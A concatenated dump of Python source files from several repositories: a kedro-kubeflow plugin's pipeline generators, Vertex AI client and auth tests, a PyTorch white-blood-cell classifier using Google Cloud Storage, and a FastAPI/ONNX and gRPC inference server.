form_relative_url,
None,
None,
]
)
headers = {
"Content-Type": "application/x-www-form-urlencoded",
}
data = {
"login": os.environ[DEX_USERNAME],
"password": <PASSWORD>[DEX_PASSWORD],
}
s.post(form_absolute_url, headers=headers, data=data)
return s.cookies.get_dict()["authservice_session"]
```
#### File: kedro_kubeflow/generators/pod_per_node_pipeline_generator.py
```python
import contextlib
import logging
from typing import Dict, Set
import kubernetes.client as k8s
from kedro.pipeline.node import Node
from kfp import dsl
from kfp.compiler._k8s_helper import sanitize_k8s_name
from ..utils import clean_name, is_mlflow_enabled
from .utils import (
create_arguments_from_parameters,
create_command_using_params_dumper,
create_container_environment,
maybe_add_params,
)
class PodPerNodePipelineGenerator(object):
log = logging.getLogger(__name__)
def __init__(self, config, project_name, context):
self.project_name = project_name
self.context = context
dsl.ContainerOp._DISABLE_REUSABLE_COMPONENT_WARNING = True
self.run_config = config.run_config
self.catalog = context.config_loader.get("catalog*")
def configure_max_cache_staleness(self, kfp_ops):
if self.run_config.max_cache_staleness not in [None, ""]:
for _, op in kfp_ops.items():
op.execution_options.caching_strategy.max_cache_staleness = (
self.run_config.max_cache_staleness
)
def generate_pipeline(self, pipeline, image, image_pull_policy):
@dsl.pipeline(
name=self.project_name,
description=self.run_config.description,
)
@maybe_add_params(self.context.params)
def convert_kedro_pipeline_to_kfp() -> None:
"""Convert from a Kedro pipeline into a kfp container graph."""
dsl.get_pipeline_conf().set_ttl_seconds_after_finished(
self.run_config.ttl
)
node_dependencies = self.context.pipelines.get(
pipeline
).node_dependencies
with self._create_pipeline_exit_handler(
pipeline, image, image_pull_policy
):
kfp_ops = self._build_kfp_ops(
pipeline, node_dependencies, image, image_pull_policy
)
self.configure_max_cache_staleness(kfp_ops)
for node, dependencies in node_dependencies.items():
for dependency in dependencies:
kfp_ops[node.name].after(kfp_ops[dependency.name])
return convert_kedro_pipeline_to_kfp
def _create_pipeline_exit_handler(
self, pipeline, image, image_pull_policy
):
enable_volume_cleaning = (
self.run_config.volume is not None
and not self.run_config.volume.keep
)
if not enable_volume_cleaning and not self.run_config.on_exit_pipeline:
return contextlib.nullcontext()
commands = []
if enable_volume_cleaning:
commands.append(
"kedro kubeflow delete-pipeline-volume "
"{{workflow.name}}-"
+ sanitize_k8s_name(f"{pipeline}-data-volume")
)
if self.run_config.on_exit_pipeline:
commands.append(
"kedro run "
"--config config.yaml "
f"--env {self.context.env} "
f"--pipeline {self.run_config.on_exit_pipeline}"
)
exit_container_op = dsl.ContainerOp(
name="on-exit",
image=image,
command=create_command_using_params_dumper(";".join(commands)),
arguments=create_arguments_from_parameters(
self.context.params.keys()
)
+ [
"status",
"{{workflow.status}}",
"failures",
"{{workflow.failures}}",
],
container_kwargs={"env": create_container_environment()},
)
if self.run_config.max_cache_staleness not in [None, ""]:
exit_container_op.execution_options.caching_strategy.max_cache_staleness = (
self.run_config.max_cache_staleness
)
return dsl.ExitHandler(
self._customize_op(exit_container_op, image_pull_policy)
)
def _build_kfp_ops(
self,
pipeline,
node_dependencies: Dict[Node, Set[Node]],
image,
image_pull_policy,
) -> Dict[str, dsl.ContainerOp]:
"""Build kfp container graph from Kedro node dependencies."""
kfp_ops = {}
node_volumes = (
self._setup_volumes(
f"{pipeline}-data-volume", image, image_pull_policy
)
if self.run_config.volume is not None
else {}
)
nodes_env = create_container_environment()
if is_mlflow_enabled():
kfp_ops["mlflow-start-run"] = self._customize_op(
dsl.ContainerOp(
name="mlflow-start-run",
image=image,
command=["kedro"],
arguments=[
"kubeflow",
"--env",
self.context.env,
"mlflow-start",
dsl.RUN_ID_PLACEHOLDER,
],
container_kwargs={"env": nodes_env},
file_outputs={"mlflow_run_id": "/tmp/mlflow_run_id"},
),
image_pull_policy,
)
nodes_env.append(
k8s.V1EnvVar(
name="MLFLOW_RUN_ID",
value=kfp_ops["mlflow-start-run"].output,
)
)
for node in node_dependencies:
name = clean_name(node.name)
kwargs = {"env": nodes_env}
if self.run_config.resources.is_set_for(node.name):
kwargs["resources"] = k8s.V1ResourceRequirements(
limits=self.run_config.resources.get_for(node.name),
requests=self.run_config.resources.get_for(node.name),
)
kfp_ops[node.name] = self._customize_op(
dsl.ContainerOp(
name=name,
image=image,
command=create_command_using_params_dumper(
"kedro "
"run "
f"--env {self.context.env} "
f"--pipeline {pipeline} "
f"--node {node.name} "
f"--config config.yaml"
),
arguments=create_arguments_from_parameters(
self.context.params.keys()
),
pvolumes=node_volumes,
container_kwargs=kwargs,
file_outputs={
output: "/home/kedro/"
+ self.catalog[output]["filepath"]
for output in node.outputs
if output in self.catalog
and "filepath" in self.catalog[output]
and self.run_config.store_kedro_outputs_as_kfp_artifacts
},
),
image_pull_policy,
)
return kfp_ops
def _customize_op(self, op, image_pull_policy):
op.container.set_image_pull_policy(image_pull_policy)
if self.run_config.volume and self.run_config.volume.owner is not None:
op.container.set_security_context(
k8s.V1SecurityContext(run_as_user=self.run_config.volume.owner)
)
return op
def _setup_volumes(self, volume_name, image, image_pull_policy):
vop = dsl.VolumeOp(
name="data-volume-create",
resource_name=volume_name,
size=self.run_config.volume.size,
modes=self.run_config.volume.access_modes,
storage_class=self.run_config.volume.storageclass,
)
if self.run_config.max_cache_staleness not in [None, ""]:
vop.add_pod_annotation(
"pipelines.kubeflow.org/max_cache_staleness",
self.run_config.max_cache_staleness,
)
if self.run_config.volume.skip_init:
return {"/home/kedro/data": vop.volume}
else:
volume_init = self._customize_op(
dsl.ContainerOp(
name="data-volume-init",
image=image,
command=["sh", "-c"],
arguments=[
" ".join(
[
"cp",
"--verbose",
"-r",
"/home/kedro/data/*",
"/home/kedro/datavolume",
]
)
],
pvolumes={"/home/kedro/datavolume": vop.volume},
),
image_pull_policy,
)
return {"/home/kedro/data": volume_init.pvolume}
```
#### File: kedro_kubeflow/vertex_ai/client.py
```python
import json
import logging
import os
from tempfile import NamedTemporaryFile
from google.cloud.scheduler_v1.services.cloud_scheduler import (
CloudSchedulerClient,
)
from kfp.v2 import compiler
from kfp.v2.google.client import AIPlatformClient
from tabulate import tabulate
from .generator import PipelineGenerator
class VertexAIPipelinesClient:
"""
Client for Vertex AI Pipelines.
"""
log = logging.getLogger(__name__)
def __init__(self, config, project_name, context):
self.generator = PipelineGenerator(config, project_name, context)
self.api_client = AIPlatformClient(
project_id=config.project_id, region=config.region
)
self.cloud_scheduler_client = CloudSchedulerClient()
self.location = (
f"projects/{config.project_id}/locations/{config.region}"
)
self.run_config = config.run_config
def list_pipelines(self):
"""
List all the jobs (current and historical) on Vertex AI Pipelines
:return:
"""
pipelines = self.api_client.list_jobs()["pipelineJobs"]
return tabulate(
map(lambda x: [x.get("displayName"), x["name"]], pipelines),
headers=["Name", "ID"],
)
def run_once(
self,
pipeline,
image,
experiment_name,
run_name,
wait=False,
image_pull_policy="IfNotPresent",
experiment_namespace=None,
):
"""
Runs the pipeline in Vertex AI Pipelines
:param pipeline:
:param image:
:param experiment_name:
:param run_name:
:param wait:
:param image_pull_policy:
:return:
"""
with NamedTemporaryFile(
mode="rt", prefix="kedro-kubeflow", suffix=".json"
) as spec_output:
self.compile(
pipeline,
image,
output=spec_output.name,
image_pull_policy=image_pull_policy,
)
run = self.api_client.create_run_from_job_spec(
service_account=os.getenv("SERVICE_ACCOUNT"),
job_spec_path=spec_output.name,
job_id=run_name,
pipeline_root=f"gs://{self.run_config.root}",
parameter_values={},
enable_caching=False,
network=self.run_config.vertex_ai_networking.vpc,
)
self.log.info("Run created %s", str(run))
return run
def compile(
self,
pipeline,
image,
output,
image_pull_policy="IfNotPresent",
):
"""
Creates json file in given local output path
:param pipeline:
:param image:
:param output:
:param image_pull_policy:
:return:
"""
token = os.getenv("MLFLOW_TRACKING_TOKEN")
pipeline_func = self.generator.generate_pipeline(
pipeline, image, image_pull_policy, token
)
compiler.Compiler().compile(
pipeline_func=pipeline_func,
package_path=output,
)
self.log.info(
"Generated pipeline definition was saved to %s", str(output)
)
def upload(self, pipeline, image, image_pull_policy="IfNotPresent"):
"""
Upload is not supported by Vertex AI Pipelines
:param pipeline:
:param image:
:param image_pull_policy:
:return:
"""
raise NotImplementedError("Upload is not supported for VertexAI")
def _cleanup_old_schedule(self, pipeline_name):
"""
Removes old jobs scheduled for given pipeline name
"""
for job in self.cloud_scheduler_client.list_jobs(parent=self.location):
if "jobs/pipeline_pipeline" not in job.name:
continue
job_pipeline_name = json.loads(job.http_target.body)[
"pipelineSpec"
]["pipelineInfo"]["name"]
if job_pipeline_name == pipeline_name:
self.log.info(
"Found existing schedule for the pipeline at %s, deleting...",
job.schedule,
)
self.cloud_scheduler_client.delete_job(name=job.name)
def schedule(
self,
pipeline,
experiment_name,
experiment_namespace,
cron_expression,
image_pull_policy="IfNotPresent",
):
"""
Schedule pipeline to Vertex AI with given cron expression
:param pipeline:
:param experiment_name:
:param experiment_namespace:
:param cron_expression:
:param image_pull_policy:
:return:
"""
self._cleanup_old_schedule(self.generator.get_pipeline_name())
with NamedTemporaryFile(
mode="rt", prefix="kedro-kubeflow", suffix=".json"
) as spec_output:
self.compile(
pipeline,
self.run_config.image,
output=spec_output.name,
image_pull_policy=image_pull_policy,
)
self.api_client.create_schedule_from_job_spec(
job_spec_path=spec_output.name,
time_zone="Etc/UTC",
schedule=cron_expression,
pipeline_root=f"gs://{self.run_config.root}",
enable_caching=False,
)
self.log.info("Pipeline scheduled to %s", cron_expression)
```
#### File: kedro-kubeflow/tests/test_auth.py
```python
import os
import unittest
from unittest.mock import patch
import responses
from google.auth.exceptions import DefaultCredentialsError
from kedro_kubeflow.auth import AuthHandler
class TestAuthHandler(unittest.TestCase):
@patch("google.oauth2.id_token.fetch_id_token")
def test_should_error_on_invalid_creds(self, fetch_id_token_mock):
# given
os.environ["IAP_CLIENT_ID"] = "unittest-client-id"
fetch_id_token_mock.side_effect = Exception()
with self.assertLogs("kedro_kubeflow.auth", level="ERROR") as cm:
# when
token = AuthHandler().obtain_id_token()
# then
assert "Failed to obtain IAP access token" in cm.output[0]
# then
assert token is None
@patch("google.oauth2.id_token.fetch_id_token")
def test_should_warn_if_trying_to_use_default_creds(
self, fetch_id_token_mock
):
# given
os.environ["IAP_CLIENT_ID"] = "unittest-client-id"
fetch_id_token_mock.side_effect = DefaultCredentialsError()
with self.assertLogs("kedro_kubeflow.auth", level="WARNING") as cm:
# when
token = AuthHandler().obtain_id_token()
# then
assert (
"this authentication method does not work with default credentials"
in cm.output[0]
)
assert token is None
@patch("google.oauth2.id_token.fetch_id_token")
def test_should_provide_valid_token(self, fetch_id_token_mock):
# given
os.environ["IAP_CLIENT_ID"] = "unittest-client-id"
fetch_id_token_mock.return_value = "TOKEN"
# when
token = AuthHandler().obtain_id_token()
# then
assert token == "TOKEN"
def test_should_skip_dex_auth_if_env_is_not_set(self):
# given
# no env set
# when
session = AuthHandler().obtain_dex_authservice_session(None)
# then
assert session is None
def test_should_skip_dex_auth_if_env_is_incomplete(self):
# given
os.environ["DEX_USERNAME"] = "<EMAIL>"
# no password set
# when
session = AuthHandler().obtain_dex_authservice_session(None)
# then
assert session is None
def tearDown(self):
if "DEX_USERNAME" in os.environ:
del os.environ["DEX_USERNAME"]
if "DEX_PASSWORD" in os.environ:
del os.environ["DEX_PASSWORD"]
if "IAP_CLIENT_ID" in os.environ:
del os.environ["IAP_CLIENT_ID"]
@responses.activate
def test_should_get_cookie_from_dex_secured_system(self):
# given
os.environ["DEX_USERNAME"] = "<EMAIL>"
os.environ["DEX_PASSWORD"] = "pa$$"
responses.add(
responses.GET,
"https://kubeflow.local/pipeline",
body='<a href="/dex/auth/local?req=qjrrnpg3hngdu6odii3hcmfae" target="_self"',
)
responses.add(
responses.POST,
"https://kubeflow.local/dex/auth/local?req=qjrrnpg3hngdu6odii3hcmfae",
headers={"Set-cookie": "authservice_session=sessionID"},
)
# when
session = AuthHandler().obtain_dex_authservice_session(
"https://kubeflow.local/pipeline"
)
# then
assert session == "sessionID"
assert (
responses.calls[1].request.body
== "login=user%40example.com&password=pa%24%24"
)
```
#### File: kedro-kubeflow/tests/test_one_pod_pipeline_generator.py
```python
import os
import unittest
from inspect import signature
from unittest.mock import MagicMock
import kfp
from kedro.pipeline import Pipeline, node
from kedro_kubeflow.config import PluginConfig
from kedro_kubeflow.generators.one_pod_pipeline_generator import (
OnePodPipelineGenerator,
)
def identity(input1: str):
return input1 # pragma: no cover
class TestGenerator(unittest.TestCase):
def test_support_modification_of_pull_policy(self):
# given
self.create_generator()
# when
with kfp.dsl.Pipeline(None) as dsl_pipeline:
self.generator_under_test.generate_pipeline(
"pipeline", "unittest-image", "Never"
)()
# then
assert len(dsl_pipeline.ops) == 1
assert dsl_pipeline.ops["pipeline"].container.image == "unittest-image"
assert (
dsl_pipeline.ops["pipeline"].container.image_pull_policy == "Never"
)
def test_should_support_params_and_inject_them_to_the_node(self):
# given
self.create_generator(params={"param1": 0.3, "param2": 42})
# when
with kfp.dsl.Pipeline(None) as dsl_pipeline:
pipeline = self.generator_under_test.generate_pipeline(
"pipeline", "unittest-image", "Always"
)
default_params = signature(pipeline).parameters
pipeline()
# then
assert len(default_params) == 2
assert default_params["param1"].default == 0.3
assert default_params["param2"].default == 42
assert dsl_pipeline.ops["pipeline"].container.args[1:] == [
"param1",
"{{pipelineparam:op=;name=param1}}",
"param2",
"{{pipelineparam:op=;name=param2}}",
]
def test_should_not_add_resources_spec_if_not_requested(self):
# given
self.create_generator(config={})
# when
with kfp.dsl.Pipeline(None) as dsl_pipeline:
self.generator_under_test.generate_pipeline(
"pipeline", "unittest-image", "Always"
)()
# then
assert dsl_pipeline.ops["pipeline"].container.resources is None
def test_should_add_resources_spec(self):
# given
self.create_generator(
config={
"resources": {
"__default__": {"cpu": "100m", "memory": "8Gi"},
"node1": {"cpu": "400m", "memory": "64Gi"},
}
}
)
# when
with kfp.dsl.Pipeline(None) as dsl_pipeline:
self.generator_under_test.generate_pipeline(
"pipeline", "unittest-image", "Always"
)()
# then
resources = dsl_pipeline.ops["pipeline"].container.resources
assert resources.limits == {"cpu": "100m", "memory": "8Gi"}
assert resources.requests == {"cpu": "100m", "memory": "8Gi"}
def test_should_set_description(self):
# given
self.create_generator(config={"description": "DESC"})
# when
pipeline = self.generator_under_test.generate_pipeline(
"pipeline", "unittest-image", "Never"
)
# then
assert pipeline._component_description == "DESC"
def test_artifact_registration(self):
# given
self.create_generator(
catalog={
"B": {
"type": "pandas.CSVDataSet",
"filepath": "data/02_intermediate/b.csv",
}
}
)
# when
with kfp.dsl.Pipeline(None) as dsl_pipeline:
self.generator_under_test.generate_pipeline(
"pipeline", "unittest-image", "Always"
)()
# then
assert dsl_pipeline.ops["pipeline"].file_outputs == {
"B": "/home/kedro/data/02_intermediate/b.csv"
}
def test_should_skip_artifact_registration_if_requested(self):
# given
self.create_generator(
catalog={
"B": {
"type": "pandas.CSVDataSet",
"filepath": "data/02_intermediate/b.csv",
}
},
config={"store_kedro_outputs_as_kfp_artifacts": False},
)
# when
with kfp.dsl.Pipeline(None) as dsl_pipeline:
self.generator_under_test.generate_pipeline(
"pipeline", "unittest-image", "Always"
)()
# then
assert dsl_pipeline.ops["pipeline"].file_outputs == {}
def test_should_pass_kedro_config_env_to_nodes(self):
# given
self.create_generator(params={"param1": 0.3, "param2": 42})
os.environ["KEDRO_CONFIG_MY_KEY"] = "42"
os.environ["SOME_VALUE"] = "100"
try:
# when
with kfp.dsl.Pipeline(None) as dsl_pipeline:
self.generator_under_test.generate_pipeline(
"pipeline", "unittest-image", "Always"
)()
# then
env_values = {
e.name: e.value
for e in dsl_pipeline.ops["pipeline"].container.env
}
assert "KEDRO_CONFIG_MY_KEY" in env_values
assert env_values["KEDRO_CONFIG_MY_KEY"] == "42"
assert "SOME_VALUE" not in env_values
finally:
del os.environ["KEDRO_CONFIG_MY_KEY"]
del os.environ["SOME_VALUE"]
def test_should_pass_kubeflow_run_id_to_nodes(self):
# given
self.create_generator(params={"param1": 0.3, "param2": 42})
# when
with kfp.dsl.Pipeline(None) as dsl_pipeline:
self.generator_under_test.generate_pipeline(
"pipeline", "unittest-image", "Always"
)()
# then
env_values = {
e.name: e.value for e in dsl_pipeline.ops["pipeline"].container.env
}
assert "KUBEFLOW_RUN_ID" in env_values
assert env_values["KUBEFLOW_RUN_ID"] == "{{workflow.uid}}"
def create_generator(self, config=None, params=None, catalog=None):
if config is None:
config = {}
if params is None:
params = {}
if catalog is None:
catalog = {}
config_loader = MagicMock()
config_loader.get.return_value = catalog
context = type(
"obj",
(object,),
{
"env": "unittests",
"params": params,
"config_loader": config_loader,
"pipelines": {
"pipeline": Pipeline(
[
node(identity, "A", "B", name="node1"),
node(identity, "B", "C", name="node2"),
]
)
},
},
)
self.generator_under_test = OnePodPipelineGenerator(
config=PluginConfig(
{"host": "http://unittest", "run_config": config}
),
project_name="my-awesome-project",
context=context,
)
``` |
{
"source": "0shimax/Kftest",
"score": 2
} |
#### File: src/feature/metric_data_loader.py
```python
from pathlib import Path
import random
import numpy
import torch
from torchvision import datasets, transforms
from torch.utils.data import Dataset
from PIL import Image
import multiprocessing
from feature.utils import ImageTransform, GcsIO
class WBCDataset(Dataset):
def __init__(self, n_class, image_labels, root_dir,
subset="Dataset1", transform=ImageTransform(),
project="<your project id>", bucket_name="kf-test1234",
train=True):
super().__init__()
self.image_labels = image_labels
self.root_dir = root_dir
self.subset = subset
self.gcs_io = GcsIO(project, bucket_name)
self.transform = transform
self.n_class = n_class
self.train = train
self.n_relation = self.n_class**2
def __len__(self):
return len(self.image_labels)
def __getitem__(self, idx):
img_name, label = self.image_labels[idx]
image = self._read_image(img_name)
image = self.transform(image)
if self.train:
near_image = self._get_near_image(label)
far_image, far_label = self._get_far_image_and_label(label)
near_relational_tag = label*(self.n_class-1) + label
far_relational_tag = label*(self.n_class-1) + far_label
label = torch.LongTensor([label])
far_label = torch.LongTensor([far_label])
near_relational_tag = torch.LongTensor([near_relational_tag])
far_relational_tag = torch.LongTensor([far_relational_tag])
return image, label, near_image, label, far_image, far_label, near_relational_tag, far_relational_tag
else:
return image, label
def _get_far_image_and_label(self, near_category):
idxs = numpy.where(self.image_labels[:,1]!=near_category)[0]
random.shuffle(idxs)
idx = idxs[0]
img_name, label = self.image_labels[idx]
image = self._read_image(img_name)
image = self.transform(image)
return image, label
def _get_near_image(self, near_category):
idxs = numpy.where(self.image_labels[:,1]==near_category)[0]
random.shuffle(idxs)
idx = idxs[0]
img_name = self.image_labels[idx][0]
image = self._read_image(img_name)
return self.transform(image)
def _read_image(self, img_name):
image_path = '/'.join([self.root_dir, self.subset, "{0:03}.bmp".format(img_name)])
image = self.gcs_io.load_image(image_path)
return image
def loader(dataset, batch_size, shuffle=True):
loader = torch.utils.data.DataLoader(
dataset,
batch_size=batch_size,
shuffle=shuffle,
num_workers=multiprocessing.cpu_count())
return loader
```
#### File: src/feature/utils.py
```python
import io
from torchvision import transforms
from google.cloud import storage
from pathlib import Path
from PIL import Image
class ImageTransform(object):
def __init__(self):
pass
def __call__(self, x):
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
transform = transforms.Compose(
# [transforms.Resize(256),
# transforms.CenterCrop(224),
[transforms.Resize(76),
transforms.CenterCrop(64),
transforms.ToTensor(),
normalize,
])
return transform(x)
class GcsIO(object):
def __init__(self, project, bucket_name):
self.PROJECT = project
self.BUCKET_NAME = bucket_name
def upload_file(self, gcs_path, local_path):
client = storage.Client(self.PROJECT)
bucket = client.get_bucket(self.BUCKET_NAME)
blob = bucket.blob(gcs_path)
blob.upload_from_filename(local_path)
def download_file(self, gcs_path, local_path):
p_path = Path(local_path).parent
if not p_path.exists():
p_path.mkdir(parents=True)
client = storage.Client(self.PROJECT)
bucket = client.get_bucket(self.BUCKET_NAME)
blob = bucket.blob(gcs_path)
blob.download_to_filename(local_path)
def load_image(self, gcs_path):
client_storage = storage.Client(self.PROJECT)
bucket = client_storage.get_bucket(self.BUCKET_NAME)
blob = bucket.blob(gcs_path)
img = Image.open(io.BytesIO(blob.download_as_string()))
return img
```
#### File: Kftest/src/test.py
```python
from pathlib import Path
import argparse
import collections
import json
import numpy
import torch
import torch.nn as nn
import torch.nn.functional as F
import pandas
from sklearn.metrics import accuracy_score, confusion_matrix
from google.cloud import storage
from model.trans_NFCM import TransNFCM
from optimizer.radam import RAdam
from feature.metric_data_loader import WBCDataset, loader
from metric.utils import cossim, val
torch.manual_seed(555)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print("device:", device)
idx2label = {0:"Lymphocyte",
1:"Monocyte",
2:"Nuetrophil",
3:"Eosinophil",
4:"Basophil"}
def main(args):
n_relational_embeddings = args.n_class**2
n_tag_embeddings = args.n_class
in_ch, out_ch, emb_dim = 3, 128, 128
model = TransNFCM(in_ch, out_ch,
n_relational_embeddings, n_tag_embeddings,
embedding_dim=emb_dim).to(device)
image_label = pandas.read_csv(
Path("gs://",
args.bucket_name,
args.data_root,
args.metadata_file_name.format(args.subset))
)
image_label = image_label.sample(frac=1, random_state=551)
image_label["class"] = image_label["class"] - 1
image_label = image_label.values
val_dataset = WBCDataset(args.n_class, image_label[:250], args.data_root,
project=args.project, bucket_name=args.bucket_name,
subset=args.subset, train=False)
test_dataset = WBCDataset(args.n_class, image_label[250:], args.data_root,
project=args.project, bucket_name=args.bucket_name,
subset=args.subset, train=False)
val_loader = loader(val_dataset, 1, shuffle=False)
test_loader = loader(test_dataset, 1, shuffle=False)
test_loader.dataset.gcs_io.download_file(args.resume_model,
args.out_dir+"/"+args.resume_model.split("/")[-1])
if Path(args.resume_model).exists():
print("load model:", args.resume_model)
model.load_state_dict(torch.load(args.resume_model))
center_vec = val(args, model, val_loader, emb_dim=emb_dim)
test(args, model, test_loader, center_vec)
def test(args, model, data_loader, center_vec):
model.eval()
label_idxs = []
result_labels = []
with torch.no_grad():
for i, (image, cat) in enumerate(data_loader):
image = image.to(device)
cat = cat.to(device)
label_idxs.append(cat.item())
image_embedded_vec = model.predict(x=image, category=None)
vec = F.softmax(image_embedded_vec, dim=1).squeeze(0).numpy()
result_labels.append(cossim(vec, center_vec))
write_metric(args, label_idxs, result_labels, args.n_class,
list(idx2label.values()), data_loader.dataset.gcs_io)
print("done")
def write_metric(args, target, predicted, n_class, class_names, gcs_io,
cm_file='confusion_matrix.csv'):
cm = confusion_matrix(target, predicted, labels=list(range(n_class)))
accuracy = accuracy_score(target, predicted)
data = []
for target_index, target_row in enumerate(cm):
for predicted_index, count in enumerate(target_row):
data.append((class_names[target_index], class_names[predicted_index], count))
df_cm = pandas.DataFrame(data, columns=['target', 'predicted', 'count'])
cm_file_path = '/'.join([args.out_dir, cm_file])
with open(cm_file_path, 'w') as f:
df_cm.to_csv(f, columns=['target', 'predicted', 'count'], header=False, index=False)
gcs_io.upload_file('{}/{}'.format(args.out_dir, cm_file), cm_file_path)
metadata = {
'outputs': [{
'type': 'confusion_matrix',
'format': 'csv',
'schema': [
{'name': 'target', 'type': 'CATEGORY'},
{'name': 'predicted', 'type': 'CATEGORY'},
{'name': 'count', 'type': 'NUMBER'},
],
'source': 'gs://{}/{}/{}'.format(args.bucket_name, args.out_dir, cm_file),
'labels': class_names,
}]
}
# meta dataをjsonに書き出し、DSLでfile_outputsに指定することでUIからConfusion Matrixを確認できる
with open(args.out_dir+'/mlpipeline-ui-metadata.json', 'w') as f:
json.dump(metadata, f)
metrics = {
'metrics': [{
'name': 'accuracy-score', # The name of the metric. Visualized as the column name in the runs table.
'numberValue': accuracy, # The value of the metric. Must be a numeric value.
'format': "PERCENTAGE", # The optional format of the metric. Supported values are "RAW" (displayed in raw format) and "PERCENTAGE" (displayed in percentage format).
}]
}
with open(args.out_dir+'/mlpipeline-metrics.json', 'w') as f:
json.dump(metrics, f)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data-root', default="data/segmentation_WBC-master")
parser.add_argument('--metadata-file-name', default="Class_Labels_of_{}.csv")
parser.add_argument('--subset', default="Dataset1")
parser.add_argument('--project', default="<your project id>")
parser.add_argument('--bucket-name', default="kf-test1234")
parser.add_argument('--n-class', type=int, default=5, help='number of class')
parser.add_argument('--resume-model', default='export/wbc/NFCM_model.pth', help='path to trained model')
parser.add_argument('--out-dir', default='export/wbc', help='folder to output data and model checkpoints')
args = parser.parse_args()
Path(args.out_dir).mkdir(parents=True, exist_ok=True),
main(args)
```
#### File: Kftest/src/train.py
```python
from pathlib import Path
import argparse
import collections
import numpy
import torch
import torch.nn as nn
import torch.nn.functional as F
import pandas
from google.cloud import storage
from model.trans_NFCM import TransNFCM
from optimizer.radam import RAdam
from feature.metric_data_loader import WBCDataset, loader
from feature.utils import GcsIO
torch.manual_seed(555)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print("device:", device)
idx2label = {0:"Lymphocyte",
1:"Monocyte",
2:"Nuetrophil",
3:"Eosinophil",
4:"Basophil"}
def main(args):
n_relational_embeddings = args.n_class**2
n_tag_embeddings = args.n_class
in_ch, out_ch, emb_dim = 3, 128, 128
model = TransNFCM(in_ch, out_ch,
n_relational_embeddings, n_tag_embeddings,
embedding_dim=emb_dim).to(device)
optimizer = RAdam(model.parameters(), weight_decay=1e-3)
image_label = pandas.read_csv(
Path("gs://",
args.bucket_name,
args.data_root,
args.metadata_file_name.format(args.subset))
)
image_label = image_label.sample(frac=1, random_state=551)
image_label["class"] = image_label["class"] - 1
image_label = image_label.values
train_dataset = WBCDataset(args.n_class, image_label[:250], args.data_root,
project=args.project, bucket_name=args.bucket_name,
subset=args.subset, train=True)
train_loader = loader(train_dataset, args.batch_size)
train(args, model, optimizer, train_loader)
def train(args, model, optimizer, data_loader, model_name="NFCM_model.pth"):
model.train()
for epoch in range(args.epochs):
for i, (image, cat, near_image, near_cat, far_image, far_cat, near_relation, far_relation) in enumerate(data_loader):
image = image.to(device)
cat = cat.to(device)
near_image = near_image.to(device)
near_cat = near_cat.to(device)
far_image = far_image.to(device)
far_cat = far_cat.to(device)
near_relation = near_relation.to(device)
far_relation = far_relation.to(device)
model.zero_grad()
optimizer.zero_grad()
loss = model(image, near_image, image, far_image,
cat, near_cat, cat, far_cat,
near_relation, far_relation).sum()
loss.backward()
optimizer.step()
print('[{}/{}][{}/{}] Loss: {:.4f}'.format(
epoch, args.epochs, i,
len(data_loader), loss.item()))
model_path = args.out_dir+"/"+model_name
torch.save(model.state_dict(), model_path)
data_loader.dataset.gcs_io.upload_file(model_path, model_path)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data-root', default="data/segmentation_WBC-master")
parser.add_argument('--metadata-file-name', default="Class_Labels_of_{}.csv")
parser.add_argument('--subset', default="Dataset1")
parser.add_argument('--project', default="<your project id>")
parser.add_argument('--bucket-name', default="kf-test1234")
parser.add_argument('--n-class', type=int, default=5, help='number of class')
parser.add_argument('--batch-size', type=int, default=32, help='input batch size')
parser.add_argument('--epochs', type=int, default=30, help='number of epochs to train for')
parser.add_argument('--out-dir', default='export/wbc', help='folder to output data and model checkpoints')
args = parser.parse_args()
Path(args.out_dir).mkdir(parents=True, exist_ok=True),
main(args)
``` |
{
"source": "0shimax/load-testing-of-api-server",
"score": 2
} |
#### File: fastapi_server/app/prediction.py
```python
from typing import ByteString
import botocore
from logging import getLogger
import onnxruntime as rt
from models import Features
from models import PredictionResult
logger = getLogger("uvicorn.access")
class Classifier(object):
session = None
float_input_name = None
categorical_input_name = None
label_name = None
def __init__(
self,
s3_client: botocore.client.BaseClient = None,
s3_bucket: str = None,
s3_bucket_key: str = None,
model_file_path: str = None
):
logger.info("Initializing model...")
self.s3_client = s3_client
self.s3_bucket = s3_bucket
self.s3_bucket_key = s3_bucket_key
self.model_file_path = model_file_path
self.load_model()
def _read_model_from_s3(self) -> ByteString:
return self.s3_client.get_object(
Bucket=self.s3_bucket,
Key=self.s3_bucket)["Body"]
def _build_session(self) -> rt.InferenceSession:
if self.s3_bucket:
logger.info("Fetching model file from S3...")
return rt.InferenceSession(self._read_model_from_s3())
else:
logger.info("Fetching model file from Local...")
return rt.InferenceSession(self.model_file_path)
def load_model(self) -> None:
logger.info("Loading model...")
logger.info("Building session...")
self.session = self._build_session()
logger.info("Session build Done.")
self.float_input_name = self.session.get_inputs()[0].name
self.categorical_input_name = self.session.get_inputs()[1].name
self.label_name = self.session.get_outputs()[1].name
logger.info("Model load Done.")
def predict(self, data: Features) -> PredictionResult:
inputs = {
self.float_input_name: Features.to_numpy(data.float_features),
self.categorical_input_name: Features.to_numpy(data.categorical_features),
}
predicted = self.session.run([self.label_name], inputs)[0]
return PredictionResult(**{"predicted": [v[1] for v in predicted]})
```
#### File: app/ml/client.py
```python
import asyncio
import logging
import grpc
from onnxGrpcServer_pb2 import Features, UpdateParams
from onnxGrpcServer_pb2_grpc import CTCVInferenceServicerStub
import input_data
import time
async def request(stub, payloads):
start = time.perf_counter()
responses = stub.Predict(iter(payloads))
while True:
response = await responses.read()
if response == grpc.aio.EOF:
break
# print(f"responce: {response.prob}")
print("net time[ms]:", time.perf_counter() - start)
async def run():
async with grpc.aio.insecure_channel('localhost:50051') as channel:
stub = CTCVInferenceServicerStub(channel)
payloads = []
for i in range(10):
payloads.append(Features(**input_data.features_one[i%2]))
await request(stub, payloads)
async def update():
async with grpc.aio.insecure_channel('localhost:50051') as channel:
stub = CTCVInferenceServicerStub(channel)
res = stub.UpdateModel(UpdateParams(param="updating"))
while True:
response = await res
if response == grpc.aio.EOF:
break
print(res)
if __name__ == '__main__':
logging.basicConfig()
asyncio.run(run())
# asyncio.run(update())
``` |
{
"source": "0shimax/Pytorch-DRN",
"score": 3
} |
#### File: src/feature/eme_data_loader.py
```python
from pathlib import Path
import pandas as pd
import numpy as np
import random
import torch
